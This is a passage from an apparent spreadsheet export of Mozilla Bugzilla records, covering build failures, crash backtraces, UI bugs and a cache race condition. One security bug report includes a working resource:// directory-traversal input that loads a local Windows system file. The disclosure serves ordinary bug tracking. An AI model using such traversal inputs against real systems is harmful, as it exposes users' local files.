0012d104 100026f5 xul!nsThread::ProcessNextEvent+0x19f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\xpcom\threads\nsthread.cpp @ 666]
0012d144 011bc8e2 nspr4!PR_Unlock+0x25
00000000 00000000 xul!MessageLoop::RunHandler+0x21 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\ipc\chromium\src\base\message_loop.cc @ 202]</t>
        </is>
      </c>
      <c r="X3713" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3714">
      <c r="A3714" t="n">
        <v>261993</v>
      </c>
      <c r="B3714" t="inlineStr">
        <is>
          <t>2004-09-28 14:57:25 -0700</t>
        </is>
      </c>
      <c r="C3714" t="inlineStr">
        <is>
          <t>rampant uninitialized value error in log with fix for bug 255512</t>
        </is>
      </c>
      <c r="D3714" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:41 -0800</t>
        </is>
      </c>
      <c r="E3714" t="n">
        <v>1</v>
      </c>
      <c r="F3714" t="n">
        <v>1</v>
      </c>
      <c r="G3714" t="n">
        <v>4</v>
      </c>
      <c r="H3714" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3714" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3714" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K3714" t="inlineStr">
        <is>
          <t>2.19</t>
        </is>
      </c>
      <c r="L3714" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3714" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3714" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3714" t="inlineStr"/>
      <c r="Q3714" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3714" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3714" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T3714" t="n">
        <v>1</v>
      </c>
      <c r="U3714" t="n">
        <v>0</v>
      </c>
      <c r="V3714" t="n">
        <v>6</v>
      </c>
      <c r="W3714" t="inlineStr">
        <is>
          <t>Ever since the fix for bug 255512 was checked in and landfill's tip install
upgraded to it, landfill's httpd error log has been bombarded with the following
error:
[Thu Sep 23 13:30:16 2004] [error] [client 67.109.126.2] [Thu Sep 23 13:30:16
2004] buglist.cgi: Use of uninitialized value in numeric eq (==) at
/var/www/html/bugzilla-tip/buglist.cgi line 842., referer:
http://landfill.bugzilla.org/bugzilla-tip/query.cgi
It's bad enough to have taken about 90MB of space on disk before I discovered it
today.  Since Sunday morning (two and a half days ago), 173K of 174K lines in
the log are that error.</t>
        </is>
      </c>
      <c r="X3714" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3715">
      <c r="A3715" t="n">
        <v>1534422</v>
      </c>
      <c r="B3715" t="inlineStr">
        <is>
          <t>2019-03-11 13:48:34 -0700</t>
        </is>
      </c>
      <c r="C3715" t="inlineStr">
        <is>
          <t>[FAILED] tests failed on android and linux machines</t>
        </is>
      </c>
      <c r="D3715" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E3715" t="n">
        <v>1</v>
      </c>
      <c r="F3715" t="n">
        <v>1</v>
      </c>
      <c r="G3715" t="n">
        <v>6</v>
      </c>
      <c r="H3715" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3715" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J3715" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K3715" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3715" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3715" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3715" t="inlineStr"/>
      <c r="Q3715" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3715" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3715" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3715" t="n">
        <v>1</v>
      </c>
      <c r="U3715" t="n">
        <v>0</v>
      </c>
      <c r="V3715" t="n">
        <v>3</v>
      </c>
      <c r="W3715" t="inlineStr">
        <is>
          <t>current issue : https://treeherder.mozilla.org/#/jobs?repo=mozilla-release&amp;resultStatus=usercancel%2Cretry%2Ctestfailed%2Cbusted%2Cexception%2Crunnable&amp;group_state=expanded&amp;revision=e5dc798ba83b99c6c8a94795a3dce55450853566&amp;selectedJob=233207638</t>
        </is>
      </c>
      <c r="X3715" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3716">
      <c r="A3716" t="n">
        <v>1065636</v>
      </c>
      <c r="B3716" t="inlineStr">
        <is>
          <t>2014-09-10 13:59:34 -0700</t>
        </is>
      </c>
      <c r="C3716" t="inlineStr">
        <is>
          <t>Unpin-all with new flexbox implementation causes pinboard containers to shift and resize</t>
        </is>
      </c>
      <c r="D3716" t="inlineStr">
        <is>
          <t>2015-02-12 13:39:34 -0800</t>
        </is>
      </c>
      <c r="E3716" t="n">
        <v>1</v>
      </c>
      <c r="F3716" t="n">
        <v>1</v>
      </c>
      <c r="G3716" t="n">
        <v>7</v>
      </c>
      <c r="H3716" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3716" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3716" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3716" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3716" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3716" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3716" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3716" t="inlineStr"/>
      <c r="Q3716" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R3716" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3716" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3716" t="n">
        <v>1</v>
      </c>
      <c r="U3716" t="n">
        <v>0</v>
      </c>
      <c r="V3716" t="n">
        <v>4</v>
      </c>
      <c r="W3716" t="inlineStr">
        <is>
          <t>As discussed with wlach on IRC, the new flexbox work has led to some minor issues during an un-pin all.
To reproduce
o open a local instance using latest master
o pin any one job
o with the pinboard open, select unpin-all
Expected
o the jobs are unpinned
Observed
o the jobs are unpinned
o the 3 remaining containers shift to the right
o the left hand job content div shrinks to several px high
I'll attach a couple of screen grabs comparing current production vs. master (ie. not yet pushed).</t>
        </is>
      </c>
      <c r="X3716" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3717">
      <c r="A3717" t="n">
        <v>1654285</v>
      </c>
      <c r="B3717" t="inlineStr">
        <is>
          <t>2020-07-21 07:11:14 -0700</t>
        </is>
      </c>
      <c r="C3717" t="inlineStr">
        <is>
          <t>Intermittent make[4]: *** [Unified_cpp_dom_base8.o] Error 254</t>
        </is>
      </c>
      <c r="D3717" t="inlineStr">
        <is>
          <t>2020-07-26 23:19:17 -0700</t>
        </is>
      </c>
      <c r="E3717" t="n">
        <v>1</v>
      </c>
      <c r="F3717" t="n">
        <v>1</v>
      </c>
      <c r="G3717" t="n">
        <v>7</v>
      </c>
      <c r="H3717" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3717" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3717" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3717" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3717" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3717" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3717" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3717" t="inlineStr"/>
      <c r="Q3717" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3717" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3717" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3717" t="n">
        <v>1</v>
      </c>
      <c r="U3717" t="n">
        <v>0</v>
      </c>
      <c r="V3717" t="n">
        <v>7</v>
      </c>
      <c r="W3717" t="inlineStr">
        <is>
          <t>**Filed by:** rmaries [at] mozilla.com
**Parsed log:** https://treeherder.mozilla.org/logviewer.html#?job_id=310551483&amp;repo=autoland
**Full log:** https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/F08uP-D4S7mu2076dAy-Og/runs/0/artifacts/public/logs/live_backing.log
---
[task 2020-07-21T13:54:10.916Z] 13:54:10     INFO -  clang-9: error: unable to execute command: Segmentation fault
[task 2020-07-21T13:54:10.916Z] 13:54:10     INFO -  clang-9: error: clang frontend command failed due to signal (use -v to see invocation)
[task 2020-07-21T13:54:10.917Z] 13:54:10     INFO -  clang version 9.0.1
[task 2020-07-21T13:54:10.917Z] 13:54:10     INFO -  Target: x86_64-unknown-linux-gnu
[task 2020-07-21T13:54:10.917Z] 13:54:10     INFO -  Thread model: posix
[task 2020-07-21T13:54:10.918Z] 13:54:10     INFO -  InstalledDir: /builds/worker/fetches/clang/bin
[task 2020-07-21T13:54:10.918Z] 13:54:10     INFO -  clang-9: note: diagnostic msg: PLEASE submit a bug report to https://bugs.llvm.org/ and include the crash backtrace, preprocessed source, and associated run script.
[task 2020-07-21T13:54:10.919Z] 13:54:10     INFO -  clang-9: note: diagnostic msg:
[task 2020-07-21T13:54:10.919Z] 13:54:10     INFO -  ********************
[task 2020-07-21T13:54:10.919Z] 13:54:10     INFO -  PLEASE ATTACH THE FOLLOWING FILES TO THE BUG REPORT:
[task 2020-07-21T13:54:10.920Z] 13:54:10     INFO -  Preprocessed source(s) and associated run script(s) are located at:
[task 2020-07-21T13:54:10.920Z] 13:54:10     INFO -  clang-9: note: diagnostic msg: /builds/worker/artifacts/Unified_cpp_dom_base8-5538ac.cpp
[task 2020-07-21T13:54:10.921Z] 13:54:10     INFO -  clang-9: note: diagnostic msg: /builds/worker/artifacts/Unified_cpp_dom_base8-5538ac.sh
[task 2020-07-21T13:54:10.921Z] 13:54:10     INFO -  clang-9: note: diagnostic msg:
[task 2020-07-21T13:54:10.922Z] 13:54:10     INFO -  ********************
[task 2020-07-21T13:54:10.922Z] 13:54:10     INFO -  /builds/worker/checkouts/gecko/config/rules.mk:746: recipe for target 'Unified_cpp_dom_base8.o' failed
[task 2020-07-21T13:54:10.922Z] 13:54:10    ERROR -  make[4]: *** [Unified_cpp_dom_base8.o] Error 254
[task 2020-07-21T13:54:10.923Z] 13:54:10     INFO -  make[4]: Leaving directory '/builds/worker/workspace/obj-build/dom/base'
[task 2020-07-21T13:54:10.923Z] 13:54:10     INFO -  make[4]: *** Waiting for unfinished jobs....
[task 2020-07-21T13:54:10.924Z] 13:54:10     INFO -  make[4]: Entering directory '/builds/worker/workspace/obj-build/dom/media/webaudio/blink'
[task 2020-07-21T13:54:10.924Z] 13:54:10     INFO -  dom/media/webaudio/blink/Unified_cpp_webaudio_blink1.o
[task 2020-07-21T13:54:10.924Z] 13:54:10     INFO -  make[4]: Leaving directory '/builds/worker/workspace/obj-build/dom/media/webaudio/blink'
[task 2020-07-21T13:54:10.992Z] 13:54:10     INFO -  make[4]: Entering directory '/builds/worker/workspace/obj-build/dom/media/platforms/ffmpeg'
[task 2020-07-21T13:54:10.992Z] 13:54:10     INFO -  /builds/worker/fetches/sccache/sccache /builds/worker/fetches/clang/bin/clang++ -std=gnu++17 -o Unified_cpp_platforms_ffmpeg0.o -c  -I/builds/worker/workspace/obj-build/dist/stl_wrappers -I/builds/worker/workspace/obj-build/dist/system_wrappers -include /builds/worker/checkouts/gecko/config/gcc_hidden.h -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=2 -fstack-protector-strong -DNDEBUG=1 -DTRIMMED=1 -DOS_POSIX=1 -DOS_LINUX=1 -DMOZ_HAS_MOZGLUE -DMOZILLA_INTERNAL_API -DIMPL_LIBXUL -DSTATIC_EXPORTABLE_JS_API -I/builds/worker/checkouts/gecko/dom/media/platforms/ffmpeg -I/builds/worker/workspace/obj-build/dom/media/platforms/ffmpeg -I/builds/worker/workspace/obj-build/ipc/ipdl/_ipdlheaders -I/builds/worker/checkouts/gecko/ipc/chromium/src -I/builds/worker/checkouts/gecko/ipc/glue -I/builds/worker/workspace/obj-build/dist/include -I/builds/worker/workspace/obj-build/dist/include/nspr -I/builds/worker/workspace/obj-build/dist/include/nss -fPIC -DMOZILLA_CLIENT -include /builds/worker/workspace/obj-build/mozilla-config.h -Qunused-arguments -Qunused-arguments -Wall -Wbitfield-enum-conversion -Wempty-body -Wignored-qualifiers -Woverloaded-virtual -Wpointer-arith -Wshadow-field-in-constructor-modified -Wsign-compare -Wtype-limits -Wunreachable-code -Wunreachable-code-return -Wwrite-strings -Wno-invalid-offsetof -Wclass-varargs -Wempty-init-stmt -Wfloat-overflow-conversion -Wfloat-zero-conversion -Wloop-analysis -Wc++2a-compat -Wcomma -Wimplicit-fallthrough -Wunused-function -Wunused-variable -Wstring-conversion -Wtautological-overlap-compare -Wtautological-unsigned-enum-zero-compare -Wtautological-unsigned-zero-compare -Wno-error=tautological-type-limit-compare -Wno-inline-new-delete -Wno-error=deprecated-declarations -Wno-error=array-bounds -Wno-error=backend-plugin -Wno-error=return-std-move -Wno-error=atomic-alignment -Wformat -Wformat-security -Wno-gnu-zero-variadic-macro-arguments -Werror=implicit-function-declaration -Wno-unknown-warning-option -D_GLIBCXX_USE_CXX11_ABI=0 -fno-sized-deallocation -fno-aligned-new -fsanitize=thread -fcrash-diagnostics-dir=/builds/worker/artifacts -fno-exceptions -fno-strict-aliasing -fno-rtti -ffunction-sections -fdata-sections -fno-exceptions -fno-math-errno -pthread -pipe -g -Xclang -load -Xclang /builds/worker/workspace/obj-build/build/clang-plugin/libclang-plugin.so -Xclang -add-plugin -Xclang moz-check -O2 -gline-tables-only -fomit-frame-pointer -funwind-tables -fexperimental-new-pass-manager  -MD -MP -MF .deps/Unified_cpp_platforms_ffmpeg0.o.pp   Unified_cpp_platforms_ffmpeg0.cpp
[task 2020-07-21T13:54:10.993Z] 13:54:10     INFO -  make[4]: Leaving directory '/builds/worker/workspace/obj-build/dom/media/platforms/ffmpeg'
[task 2020-07-21T13:54:11.014Z] 13:54:11     INFO -  make[4]: Entering directory '/builds/worker/workspace/obj-build/dom/media/webaudio'
[task 2020-07-21T13:54:11.014Z] 13:54:11     INFO -  mkdir -p '.deps/'</t>
        </is>
      </c>
      <c r="X3717" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3718">
      <c r="A3718" t="n">
        <v>939105</v>
      </c>
      <c r="B3718" t="inlineStr">
        <is>
          <t>2013-11-15 07:00:56 -0800</t>
        </is>
      </c>
      <c r="C3718" t="inlineStr">
        <is>
          <t>test_sms_contact_match weird intermittent failure on Travis</t>
        </is>
      </c>
      <c r="D3718" t="inlineStr">
        <is>
          <t>2013-11-20 08:30:38 -0800</t>
        </is>
      </c>
      <c r="E3718" t="n">
        <v>1</v>
      </c>
      <c r="F3718" t="n">
        <v>1</v>
      </c>
      <c r="G3718" t="n">
        <v>6</v>
      </c>
      <c r="H3718" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3718" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3718" t="inlineStr">
        <is>
          <t>Gaia::UI Tests</t>
        </is>
      </c>
      <c r="K3718" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3718" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3718" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3718" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3718" t="inlineStr"/>
      <c r="Q3718" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3718" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3718" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3718" t="n">
        <v>1</v>
      </c>
      <c r="U3718" t="n">
        <v>0</v>
      </c>
      <c r="V3718" t="n">
        <v>10</v>
      </c>
      <c r="W3718" t="inlineStr">
        <is>
          <t>While investigating this test we have a weird situation where it looks like a legitimate failure, but we also have a quite poor wait.
The bug would be that Messages app is not pulling in the correct name from the Contacts app.
two tasks:
1. Try to replicate it against desktopb2g (and capture a HTML report)
2. Improve the wait.
3. If it is a legitimate failure, file the bug for it.
If all else fails just do step 2 and we will see if this replicates on Travis again.
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/marionette_client-0.6.2-py2.7.egg/marionette/marionette_test.py", line 143, in run
testMethod()
File "/home/travis/build/mozilla-b2g/gaia/tests/python/gaia-ui-tests/gaiatest/tests/functional/messages/test_sms_contact_match.py", line 32, in test_contact_match
self.assertEqual(self.contact['name'][0], new_message.first_recipient_name)
TEST-UNEXPECTED-FAIL | test_sms_contact_match.py test_sms_contact_match.TestContactMatch.test_contact_match | AssertionError: 'gaia625315 test' != u'yaia625315 test'
----------------------------------------------------------------------
Ran 1 test in 13.837s
FAILED (failures=1)</t>
        </is>
      </c>
      <c r="X3718" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3719">
      <c r="A3719" t="n">
        <v>367428</v>
      </c>
      <c r="B3719" t="inlineStr">
        <is>
          <t>2007-01-18 15:44:07 -0800</t>
        </is>
      </c>
      <c r="C3719" t="inlineStr">
        <is>
          <t>resource:// directory traversal</t>
        </is>
      </c>
      <c r="D3719" t="inlineStr">
        <is>
          <t>2009-03-10 10:16:47 -0700</t>
        </is>
      </c>
      <c r="E3719" t="n">
        <v>1</v>
      </c>
      <c r="F3719" t="n">
        <v>1</v>
      </c>
      <c r="G3719" t="n">
        <v>3</v>
      </c>
      <c r="H3719" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3719" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3719" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3719" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3719" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3719" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3719" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3719" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q3719" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3719" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3719" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T3719" t="n">
        <v>1</v>
      </c>
      <c r="U3719" t="n">
        <v>0</v>
      </c>
      <c r="V3719" t="n">
        <v>21</v>
      </c>
      <c r="W3719" t="inlineStr">
        <is>
          <t>Created attachment 251981
testcase
resource://gre/../../../../boot.ini =&gt; Firefox can't find the file at /boot.ini.
resource://gre/..\..\..\..\boot.ini =&gt; File loads successfully.
This bug can be used to check existence of local files
since resource:// and file:// have different restrictions.
Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1.2pre)
Gecko/20070117 BonEcho/2.0.0.2pre</t>
        </is>
      </c>
      <c r="X3719" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3720">
      <c r="A3720" t="n">
        <v>98112</v>
      </c>
      <c r="B3720" t="inlineStr">
        <is>
          <t>2001-09-03 17:14:18 -0700</t>
        </is>
      </c>
      <c r="C3720" t="inlineStr">
        <is>
          <t>Edit attachment should appear in comments.</t>
        </is>
      </c>
      <c r="D3720" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E3720" t="n">
        <v>1</v>
      </c>
      <c r="F3720" t="n">
        <v>1</v>
      </c>
      <c r="G3720" t="n">
        <v>4</v>
      </c>
      <c r="H3720" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3720" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3720" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K3720" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L3720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3720" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3720" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3720" t="inlineStr"/>
      <c r="Q3720" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R3720" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3720" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3720" t="n">
        <v>1</v>
      </c>
      <c r="U3720" t="n">
        <v>0</v>
      </c>
      <c r="V3720" t="n">
        <v>3</v>
      </c>
      <c r="W3720" t="inlineStr">
        <is>
          <t>You should be able to edit the attachment at the attachment in the comments
section as well as the attachments table.</t>
        </is>
      </c>
      <c r="X3720" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3721">
      <c r="A3721" t="n">
        <v>389815</v>
      </c>
      <c r="B3721" t="inlineStr">
        <is>
          <t>2007-07-27 02:04:51 -0700</t>
        </is>
      </c>
      <c r="C3721" t="inlineStr">
        <is>
          <t>Can't edit shared queries if you can't run them</t>
        </is>
      </c>
      <c r="D3721" t="inlineStr">
        <is>
          <t>2008-02-11 16:57:37 -0800</t>
        </is>
      </c>
      <c r="E3721" t="n">
        <v>1</v>
      </c>
      <c r="F3721" t="n">
        <v>1</v>
      </c>
      <c r="G3721" t="n">
        <v>4</v>
      </c>
      <c r="H3721" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3721" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3721" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K3721" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L3721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3721" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3721" t="inlineStr"/>
      <c r="Q3721" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R3721" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S3721" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T3721" t="n">
        <v>1</v>
      </c>
      <c r="U3721" t="n">
        <v>0</v>
      </c>
      <c r="V3721" t="n">
        <v>5</v>
      </c>
      <c r="W3721" t="inlineStr">
        <is>
          <t>paul and I both have queries that crash when we run them. We've shared them (hi as "bugs with my patches2", mine as "patched").
There's no way for people to find out why our queries crash. Even though if they were us, they could click a fancy edit link at the top of the page.</t>
        </is>
      </c>
      <c r="X3721" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3722">
      <c r="A3722" t="n">
        <v>695003</v>
      </c>
      <c r="B3722" t="inlineStr">
        <is>
          <t>2011-10-17 08:31:15 -0700</t>
        </is>
      </c>
      <c r="C3722" t="inlineStr">
        <is>
          <t>Race condition when deleting cache directory</t>
        </is>
      </c>
      <c r="D3722" t="inlineStr">
        <is>
          <t>2011-12-09 11:44:20 -0800</t>
        </is>
      </c>
      <c r="E3722" t="n">
        <v>1</v>
      </c>
      <c r="F3722" t="n">
        <v>1</v>
      </c>
      <c r="G3722" t="n">
        <v>3</v>
      </c>
      <c r="H3722" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3722" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3722" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K3722" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3722" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3722" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3722" t="inlineStr">
        <is>
          <t>[inbound] [may need patch for Firefox 8 if we find more problems like bug 681407]</t>
        </is>
      </c>
      <c r="Q3722" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3722" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3722" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3722" t="n">
        <v>1</v>
      </c>
      <c r="U3722" t="n">
        <v>0</v>
      </c>
      <c r="V3722" t="n">
        <v>35</v>
      </c>
      <c r="W3722" t="inlineStr">
        <is>
          <t>This is a follow-up bug of #681407. We access the trash directory from multiple threads without any synchronization. In fact there is almost guaranteed race condition when the disk cache is cleared. First the cache directory is renamed to cache.trash in nsDiskCacheDevice::ClearDiskCache() and an event to delete this trash is posted to a background thread. Then we check if there is any trash directory in nsDiskCacheDevice::OpenDiskCache() and we try to delete it again.
#0  DeleteDir (dirIn=0xe8258f00, moveToTrash=0, sync=0, delay=0) at /opt/moz/hg/netwerk/cache/nsDeleteDir.cpp:69
#1  0x013ea2d2 in nsDiskCacheDevice::OpenDiskCache (this=0xe9de44e0) at /opt/moz/hg/netwerk/cache/nsDiskCacheDevice.cpp:1045
#2  0x013e8adf in nsDiskCacheDevice::Init (this=0xe9de44e0) at /opt/moz/hg/netwerk/cache/nsDiskCacheDevice.cpp:424
#3  0x013ea39d in nsDiskCacheDevice::ClearDiskCache (this=0xe9de44e0) at /opt/moz/hg/netwerk/cache/nsDiskCacheDevice.cpp:1070
#4  0x013e9fc8 in nsDiskCacheDevice::EvictEntries (this=0xe9de44e0, clientID=0x0)
    at /opt/moz/hg/netwerk/cache/nsDiskCacheDevice.cpp:978
#5  0x013dce75 in nsCacheService::EvictEntriesForClient (this=0xe9852ca0, clientID=0x0, storagePolicy=0)
    at /opt/moz/hg/netwerk/cache/nsCacheService.cpp:1214
#6  0x013dd1ee in nsCacheService::EvictEntries (this=0xe9852ca0, storagePolicy=0)
    at /opt/moz/hg/netwerk/cache/nsCacheService.cpp:1326</t>
        </is>
      </c>
      <c r="X3722" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3723">
      <c r="A3723" t="n">
        <v>496265</v>
      </c>
      <c r="B3723" t="inlineStr">
        <is>
          <t>2009-06-03 22:24:33 -0700</t>
        </is>
      </c>
      <c r="C3723" t="inlineStr">
        <is>
          <t>firefox crash causing by failing to load gif image as body background. [XError: 'BadAlloc (insufficient resources for operation)']</t>
        </is>
      </c>
      <c r="D3723" t="inlineStr">
        <is>
          <t>2009-06-30 07:36:15 -0700</t>
        </is>
      </c>
      <c r="E3723" t="n">
        <v>1</v>
      </c>
      <c r="F3723" t="n">
        <v>1</v>
      </c>
      <c r="G3723" t="n">
        <v>2</v>
      </c>
      <c r="H3723" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3723" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3723" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3723" t="inlineStr">
        <is>
          <t>3.0 Branch</t>
        </is>
      </c>
      <c r="L3723" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3723" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3723" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3723" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3723" t="inlineStr">
        <is>
